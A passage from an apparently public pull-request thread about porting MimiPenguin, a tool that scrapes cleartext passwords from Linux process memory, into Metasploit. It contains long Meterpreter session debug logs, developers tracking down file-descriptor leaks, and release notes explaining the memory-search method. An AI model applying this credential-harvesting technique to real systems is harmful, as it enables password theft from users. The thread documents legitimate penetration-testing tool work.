  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-308">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=308>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-309">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=309>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-310">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=310>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-311">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=311>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-312">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=312>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-313">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=313>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-314">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=314>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-315">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=315>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-316">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=316>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-317">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=317>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-318">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=318>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-319">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=319>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-320">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=320>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-321">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=321>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-322">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=322>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-323">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=323>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-324">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=324>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-325">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=325>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-326">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=326>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-327">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=327>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-328">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=328>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-329">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=329>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-330">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=330>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-331">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=331>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-332">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=332>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-333">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=333>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-334">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=334>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-335">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=335>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-336">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=336>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-337">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=337>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-338">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=338>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-339">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=339>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-340">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=340>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-341">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=341>
]>
[*] 10.5.134.167 - Meterpreter session 6 closed.  Reason: Died

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=23 command=core_shutdown>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="91188205856850961535503134677805">

[adfoster-r7]

I haven't looked into the specific bug/logging scenario here; but thought it was worth noting that I ran into a similar logging output as part of an unrelated bug, it turns out that unhandled tlv packets are continuously logged to msfconsole - as it's waiting for a handler to come along eventually and do something with the TLV packet. So the continual logging may or may not be your actual issue 😄

[bwatters-r7]

@adfoster-r7 Oh; I see. Yeah. I popped open the definitive source of truth known as wireshark, and I'm seeing a never-ending channel close request in logs, but I am not seeing associated packets on the wire.
I'm logging the calls to channel close, and they are coming in, but the channel close requests are still in the queue, and are appearing in the log because they were not removed?
Are you saying this may be an issue with us not removing the channel close requests from the queue on the framework side?

[bwatters-r7]

OK..... problem located. The mad rush of cmd_exec calls is hitting the file descriptor limits allowed by the target's kernel. If I bump the value of nofiles on the target, we can get through the module.

[adfoster-r7]

The mad rush of cmd_exec calls is hitting the file descriptor limits allowed by the target's kernel

It doesn't look like this PR creates threads, it looks quite synchronous to me at the surface value - but I haven't looked further so let me know if I'm missing something there 👀

I believe the issue is caused by file descriptors being leaked and not closed correctly as part of cmd_exec - similar to rapid7/metasploit-payloads#569

[bwatters-r7]

Yup; the module is implemented synchronously, but the underlying implementation of mettle requests and channelized IO is threaded- while we wait for the output, the cleanup can/is asynchronous threads (At least we have mutexes protecting channelized IO close logic).
That said, I absolutely agree we should check out the file descriptors. It looks like we might have the possibility of leaking them (and maybe memory) here: https://github.com/rapid7/mettle/pull/232/files#diff-0618be7869581afcaf30c846e0d2763df2388afd9b8007ece5c5858ca817f37eR482

Edit and thought: Though, that would not solve the echo issue....

[adfoster-r7]

I wasn't sure which thread/issue is the main one to reply to, but I posted my latest debug steps on #16966 (comment) - just let me know where's best to continue the discussion if that's wrong the place to thread the conversation 🎉

[bwatters-r7]

Yeah; I think we're maybe looking at two things right now. I do think we have a possible fd leak in the mettle code for this PR functionality, and another leak in mettle's process creation in general. :limes:

[space-r7]

I managed to get a Kali ARM vm running and tested it with the module. It doesn't appear that Kali caches passwords in memory, but I added AARCH64 support to the module in case other distros cache passwords.

[bwatters-r7]

Release Notes

This adds a port of Mimipenguin to Metasploit. Relying on mem_search() and mem_read() (rapid7/mettle#232), this searches the memory regions of various processes for needles that are found near passwords in cleartext. Using the locations for all of the needles found, this will search the nearby regions for possible passwords.

[huntergregal]

@bcoles @space-r7

I want to thank you both heavily for your continued contributions to the modern version of MimiPenguin. Seeing it finally make it into Metasploit is heartwarming and a testament to the opensource community.

I have been away from this project for some time now - focusing mainly on my professional career. So it means a lot to see such contributions to the project. Without you two I'm not sure a proper MimiPenguin module ever would have come to fruition in any meaningful timeline.

Please don't hesitate to reach out to me on twitter. I owe you both a beer.
#HackThePlanet

[space-r7]

@bcoles @space-r7

I want to thank you both heavily for your continued contributions to the modern version of MimiPenguin. Seeing it finally make it into Metasploit is heartwarming and a testament to the opensource community.

I have been away from this project for some time now - focusing mainly on my professional career. So it means a lot to see such contributions to the project. Without you two I'm not sure a proper MimiPenguin module ever would have come to fruition in any meaningful timeline.

Please don't hesitate to reach out to me on twitter. I owe you both a beer. #HackThePlanet

Thank you so much, @huntergregal!